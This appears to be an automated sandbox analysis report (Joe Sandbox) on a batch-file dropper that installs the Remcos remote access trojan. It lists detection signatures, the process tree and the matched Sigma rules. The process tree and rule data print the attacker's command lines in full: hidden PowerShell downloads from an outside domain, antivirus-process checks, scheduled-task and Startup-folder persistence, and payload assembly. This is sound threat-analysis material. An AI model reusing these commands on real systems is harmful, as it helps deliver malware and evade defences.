Edit tour

Windows Analysis Report
9W9jJCj9EV.bat

Overview

General Information

Sample name:	9W9jJCj9EV.bat renamed because original name is a hash value
Original sample name:	e8dfdb915a523a09e139aaa900991ddd.bat
Analysis ID:	1584358
MD5:	e8dfdb915a523a09e139aaa900991ddd
SHA1:	d23f4798c549bfb7ddd968c4c2a971f67468a662
SHA256:	91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
Tags:	batuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Sigma detected: Search for Antivirus process

AI detected suspicious sample

Drops PE files with a suspicious file extension

Drops large PE files

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7664 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: 04029E121A0CFA5991749937DD22A1D9)

Acrobat.exe (PID: 7852 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 8120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 2632 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 7872 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4020 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)

msword.exe (PID: 6868 cmdline: msword.exe MD5: 6BCF42715FD1768FE1013C702612D0EE)

cmd.exe (PID: 1012 cmdline: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8060 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7916 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 988 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7000 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1812 cmdline: cmd /c md 677826 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6272 cmdline: findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3532 cmdline: cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Prostores.com (PID: 2700 cmdline: Prostores.com N MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 4908 cmdline: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3868 cmdline: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 732 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3148 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 7180 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

CineBlend.scr (PID: 1056 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 7576 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

CineBlend.scr (PID: 7580 cmdline: "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Sigma Signatures

System Summary

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4908, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F, ProcessId: 3868, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 7180, ProcessName: wscript.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 6868, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ProcessId: 1012, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js", ProcessId: 7180, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7664, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5952, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1012, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7000, ProcessName: findstr.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\677826\Prostores.com, ProcessId: 2700, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/msword.zip

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: 9W9jJCj9EV.bat

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.6% probability

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406301 FindFirstFileW,FindClose,	15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	33_2_00BBA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	33_2_00BBA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	33_2_00BAE472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	33_2_00BBA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB66DC FindFirstFileW,FindNextFileW,FindClose,	33_2_00BB66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B7C622 FindFirstFileExW,	33_2_00B7C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	33_2_00BB73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB7333 FindFirstFileW,FindClose,	33_2_00BB7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	33_2_00BAD921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	33_2_00BADC54

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BBD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

33_2_00BBD889

Source: msword.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: msword.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: msword.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: msword.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000007.00000002.2574487359.000001AA08400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: msword.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: msword.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: msword.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: msword.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: msword.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: msword.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: msword.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: msword.exe, 0000000F.00000000.1716029840.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe, 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe.14.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: msword.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: msword.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
